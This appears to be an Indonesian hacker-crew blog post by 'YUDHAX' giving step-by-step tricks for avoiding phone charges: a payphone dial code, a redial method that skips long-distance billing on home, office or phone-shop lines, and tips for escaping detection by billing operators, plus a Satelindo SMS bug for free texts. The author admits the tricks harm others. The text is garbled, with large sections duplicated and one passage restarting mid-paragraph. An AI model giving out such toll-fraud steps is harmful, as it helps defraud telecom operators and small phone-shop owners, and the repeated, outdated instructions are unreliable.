MOGA YANG DIATAS SELALU MEMBERIKAN ILMU YANG LEBIH PADA SEMUA MASYARAKAT
KITA.
===== TRIK TELPON GRATIS =====
Sebelumnya maaf jika artikel ini merugikan banyak pihak.
Begitu banyak trik untuk mendapatkan sebuah keCERDIKAN dalam berkomunikasi,
apalagi atas nama komunikasi secara GRATIS. ya kan....
Dalam hal ini saya tidak akan banyak basa-basi lagi.
I. Trik telphon gratis Lokal (dalam kota)
Fasilitas dan cara yang digunakan:
1. Telphone umum koin yang masih hidup
2. Pencet angka 1551 <--- catatan: angka 1 terakhir di pencet lama
hingga ada nada "tut/nit/nada sela lainnya"
3. Bila tanda itu telah bunyi baru tekan nomor yang dituju ( nomor
telphone lokal)
4. dan anda akan mendapatkan sambungan langsung dari telkom ke no telp
yang dituju, maka anda bisa bicara sepuas bibir anda.
note: UNTUK NOMOR LOKAL YANG TIDAK BISA DIHUBUNGI BIASANYA DIKARENAKAN:
1. TERLALU BANYAK NOMOR YANG KEMBAR
2. TERLALU BANYAK ANGKA DOMINAN BESAR MISAL 8997896/89868789/ dll
3. DAN BILA TELEPHONE YANG DITUJU BELUM TERPASANG
4. TELKOM SEDANG KENA TROUBLE :))
II. TRIK TELEPHONE GRATIS INTERLOKAL (LUAR KOTA)
Fasilitas dan cara yang digunakan:
1. Telphone rumah, kantor atau wartel tipe B (sangat dianjurkan)
2. Telphonelah seperti kita menelephone biasa ke NOMOR TUJUAN LUAR
KOTA (khusus luar kota)
3. Bicaralah sepuas hati dan sebengkak bibir anda
4. Bila telah selesai percakapan ... PERHATIKAN TRIK INI:
TRIK 1. - SEBELUM ANDA MENUTUP TELEPHON, KETIKLAH NOMOR TUJUAN PERSIS
SEPERTI NOMOR YANG DITUJU PERTAMA
misal: tujuan 021888555000 -> bila telah selesai ketikan
021888555000 lagi
JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL
TRIK 2. - SEPERTI CARA TRIK PERTAMA TADI CUMAN KITA RUBAH NOMOR TUJUAN
AKHIR
misal: tujuan 021888555000 -> bila telah selesai ketikan
031545552222 (BEDA NOMOR TUJUAN)
JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL
CATATAN: HATI² DALAM MELAKUAKN AKSI INI KARENA SANGAT MERUGIKAN LAIN PIHAK.
JANGAN SEKALI² GUNAKAN WARTEL TIPE A UNTUK MELAKUKAN TRIK II TELEPON
GRATIS KE LUAR KOTA KARENA AKAN KELIHATAN PADA KOMPUTER BILLING
OPERATOR D DAN PASTI ANDA DICURIGAI KARENA PULSA AKAN HILANG BEGITU
SAJA DARI LAYAR MONITOR OPERATOR WARTEL.
JANGAN SERING² MENGGGUNAKAN TRIK INI, KARENA AKAN MERUGIKAN "PIHAK LAIN" =))
SEGINI DULU DEH TRIK INI .. KAPAN² KITA BUAT LAGI TRIK BARU YANG LEBIH
MENGHEBOHKAN :)) SALAM MANIS BUAT SEMUA KAWAN² DI DUNIA MAYA #aikmel #e-c-h-o #postgres
#hackercrew (karena aku hanya bagian dari kalian)
-=+> YUDHAX was here <+=-
Begitu banyak trik untuk mendapatkan sebuah keCERDIKAN dalam berkomunikasi,
apalagi atas nama komunikasi secara GRATIS. ya kan....
Dalam hal ini saya tidak akan banyak basa-basi lagi.
I. Trik telphon gratis Lokal (dalam kota)
Fasilitas dan cara yang digunakan:
1. Telphone umum koin yang masih hidup
2. Pencet angka 1551 <--- catatan: angka 1 terakhir di pencet lama
hingga ada nada "tut/nit/nada sela lainnya"
3. Bila tanda itu telah bunyi baru tekan nomor yang dituju ( nomor
telphone lokal)
4. dan anda akan mendapatkan sambungan langsung dari telkom ke no telp
yang dituju, maka anda bisa bicara sepuas bibir anda.
note: UNTUK NOMOR LOKAL YANG TIDAK BISA DIHUBUNGI BIASANYA DIKARENAKAN:
1. TERLALU BANYAK NOMOR YANG KEMBAR
2. TERLALU BANYAK ANGKA DOMINAN BESAR MISAL 8997896/89868789/ dll
3. DAN BILA TELEPHONE YANG DITUJU BELUM TERPASANG
4. TELKOM SEDANG KENA TROUBLE :))
II. TRIK TELEPHONE GRATIS INTERLOKAL (LUAR KOTA)
Fasilitas dan cara yang digunakan:
1. Telphone rumah, kantor atau wartel tipe B (sangat dianjurkan)
2. Telphonelah seperti kita menelephone biasa ke NOMOR TUJUAN LUAR
KOTA (khusus luar kota)
3. Bicaralah sepuas hati dan sebengkak bibir anda
4. Bila telah selesai percakapan ... PERHATIKAN TRIK INI:
TRIK 1. - SEBELUM ANDA MENUTUP TELEPHON, KETIKLAH NOMOR TUJUAN PERSIS
SEPERTI NOMOR YANG DITUJU PERTAMA
misal: tujuan 021888555000 -> bila telah selesai ketikan
021888555000 lagi
JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL
TRIK 2. - SEPERTI CARA TRIK PERTAMA TADI CUMAN KITA RUBAH NOMOR TUJUAN
AKHIR
misal: tujuan 021888555000 -> bila telah selesai ketikan
031545552222 (BEDA NOMOR TUJUAN)
JANGAN PAKAI TOMBOL RADIAL, KARENA SERING GAGAL
CATATAN: HATI² DALAM MELAKUAKN AKSI INI KARENA SANGAT MERUGIKAN LAIN PIHAK.
JANGAN SEKALI² GUNAKAN WARTEL TIPE A UNTUK MELAKUKAN TRIK II TELEPON
GRATIS KE LUAR KOTA KARENA AKAN KELIHATAN PADA KOMPUTER BILLING
OPERATOR D DAN PASTI ANDA DICURIGAI KARENA PULSA AKAN HILANG BEGITU
SAJA DARI LAYAR MONITOR OPERATOR WARTEL.
JANGAN SERING² MENGGGUNAKAN TRIK INI, KARENA AKAN MERUGIKAN "PIHAK LAIN" =))
SEGINI DULU DEH TRIK INI .. KAPAN² KITA BUAT LAGI TRIK BARU YANG LEBIH
MENGHEBOHKAN :)) SALAM MANIS BUAT SEMUA KAWAN² DI DUNIA MAYA #aikmel #e-c-h-o #postgres
#hackercrew (karena aku hanya bagian dari kalian)
-=+> YUDHAX was here <+=-
== BUG SMS SATELINDO ==
Teknologi SMS sekarang ini memang makin marak terlebih lagi dengan keadaan
ekonomi yang Berantakan, solusi smslah yang lebih tepat dibanding menelpon
yang sangat merobek kantong. GSM yang menggunakan teknik switching dengan
memanfaatkan system base station memungkinkan kita bisa mengirim pesan
alphanumeric singkat dari sebuah Handphone ke handphone lain.oke sampe
disini preambule kita akhiri.
Kenapa dengan sms gratis yang dulu pernah populer sekarang telah susah ditemui?,
itu pertanyaan yang sangat lazim terlontar dari pikiran kita semua yang mengandalkan
sebuah promosi produk yang akhirnya menjadi komersil. Bug yang saya dapatkan pada
akhir bulan ini yaitu sebuah sms gratis dengan memanfaatkan kelemahan pada SATELINDO GSM.
kenapa satelindo? nomor yang di keluarkan pihak SATELINDO yang baru dengan nomor
eri depan 163***(misal +6281616378**) mempunyai bug yang dapat bermanfaat bagi
kita untuk ber SMS gratis dengan sipengguna. Telah dicoba dari Simpati, mentari, proXL,
dll tetap bisa dilakukan secara gratis.
cara sebagai berikut:
1. ketik SMS
2. kirim kenomor yang dituju ( misal: +6281616378** - tanpa bintang)
(yang saya dapatkan yaitu buug mentari versi 6163 <- diambil dari kode kartu dan
nomor awal dari kartu mentari tersebut)
3. cara tulis nomor yang dituju menjadi 616378** (coba dgn nomor lain bila perlu)
4. tidak menggunakan karakter apapun yang ditambah pada nomor tujuan (karakter
bintang hanya untuk menutupi nomor asli yang dituju.
4. dapat kita liat bahwa sms kita terkirim.
5. finish
Dari sana kita bisa lakukan dengan sepuas hati.
Penulis Minta MAAF KEPADA:
1. PIHAK YANG TERKAIT DENGAN SYSTEM SMS DARI SATELINDO
2. SEMUA PIHAK YANG TERILHAMI UNTUK MELAKUKAN PERCOBAAN INI
3. SEMUA YANG MEMBACA DAN KEMUDIAN TERSINGGUNG KARENA INI.
SALAM PENULIS
---- YUDHAX --------
MOGA YANG DIATAS SELALU MEMBERIKAN ILMU YANG LEBIH PADA SEMUA MASYARAKAT KITA.
ekonomi yang Berantakan, solusi smslah yang lebih tepat dibanding menelpon
yang sangat merobek kantong. GSM yang menggunakan teknik switching dengan
memanfaatkan system base station memungkinkan kita bisa mengirim pesan
alphanumeric singkat dari sebuah Handphone ke handphone lain.oke sampe
disini preambule kita akhiri.
Kenapa dengan sms gratis yang dulu pernah populer sekarang telah susah ditemui?,
itu pertanyaan yang sangat lazim terlontar dari pikiran kita semua yang mengandalkan
sebuah promosi produk yang akhirnya menjadi komersil. Bug yang saya dapatkan pada
akhir bulan ini yaitu sebuah sms gratis dengan memanfaatkan kelemahan pada SATELINDO GSM.
kenapa satelindo? nomor yang di keluarkan pihak SATELINDO yang baru dengan nomor
eri depan 163***(misal +6281616378**) mempunyai bug yang dapat bermanfaat bagi
kita untuk ber SMS gratis dengan sipengguna. Telah dicoba dari Simpati, mentari, proXL,
dll tetap bisa dilakukan secara gratis.
cara sebagai berikut:
1. ketik SMS
2. kirim kenomor yang dituju ( misal: +6281616378** - tanpa bintang)
(yang saya dapatkan yaitu buug mentari versi 6163 <- diambil dari kode kartu dan
nomor awal dari kartu mentari tersebut)
3. cara tulis nomor yang dituju menjadi 616378** (coba dgn nomor lain bila perlu)
4. tidak menggunakan karakter apapun yang ditambah pada nomor tujuan (karakter
bintang hanya untuk menutupi nomor asli yang dituju.
4. dapat kita liat bahwa sms kita terkirim.
5. finish
Dari sana kita bisa lakukan dengan sepuas hati.
Penulis Minta MAAF KEPADA:
1. PIHAK YANG TERKAIT DENGAN SYSTEM SMS DARI SATELINDO
2. SEMUA PIHAK YANG TERILHAMI UNTUK MELAKUKAN PERCOBAAN INI
3. SEMUA YANG MEMBACA DAN KEMUDIAN TERSINGGUNG KARENA INI.
SALAM PENULIS
---- YUDHAX --------
MOGA YANG DIATAS SELALU MEMBERIKAN ILMU YANG LEBIH PADA SEMUA MASYARAKAT KITA.
Langganan:
Postingan (Atom)